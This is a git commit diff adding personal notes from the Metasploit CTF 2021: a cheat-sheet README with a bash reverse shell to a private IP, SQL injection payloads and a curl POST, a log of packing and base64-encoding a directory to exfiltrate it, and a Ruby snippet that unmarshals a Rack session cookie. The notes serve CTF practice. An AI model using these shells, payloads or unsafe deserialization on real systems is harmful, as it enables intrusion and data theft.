Commit notes from Metasploit CTF 2021

Signed-off-by: Malfurious <m@lfurio.us>

2 files changed, 36 insertions, 0 deletions

diff --git a/README.txt b/README.txt
index c337ce7..b810726 100644
--- a/README.txt
+++ b/README.txt
@@ -20,3 +20,27 @@ bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 # Bash reverse shell
 ' OR 1=1-- # SQL inject (pass)
 ' OR 1=1 UNION SELECT x,y,z FROM table-- # SQL inject (leak)
 curl -i -X POST -d 'a=b&c=d' -F 'f=@file;filename=asdf' URL # curl post request
+
+
+
+**How not to exfil a directory**
+  $ zip challenge/
+  $ gzip challenge
+  $ ls
+  $ ls challenge
+  $ rm challenge.gz
+  $ man gzip
+  $ exit
+**Log Back In**
+  $ gzip -k challenge
+  $ ls
+  $ base64 challenge.gz
+  $ exit
+**Log Back In**
+  $ rm challenge.gz
+  $ tar -czf challenge
+  $ ls
+  $ tar -czf challenge.tar.gz challenge
+  $ ls
+  $ base64 challenge.tar.gz
+  $ exit
diff --git a/docs/lang/ruby/rack_session_cookie.rb b/docs/lang/ruby/rack_session_cookie.rb
new file mode 100644
index 0000000..5b0a62a
--- /dev/null
+++ b/docs/lang/ruby/rack_session_cookie.rb
@@ -0,0 +1,12 @@
+require 'base64'
+require 'cgi'
+
+# 'SessionId' class possibly not provided by import.
+# A dummy definition is needed for the Marshal.load()
+#require 'rack'
+class Rack::Session::SessionId
+end
+
+cookie = "....."
+
+obj = Marshal.load(Base64.decode64(CGI.unescape(cookie.split("\n").join).split('--').first))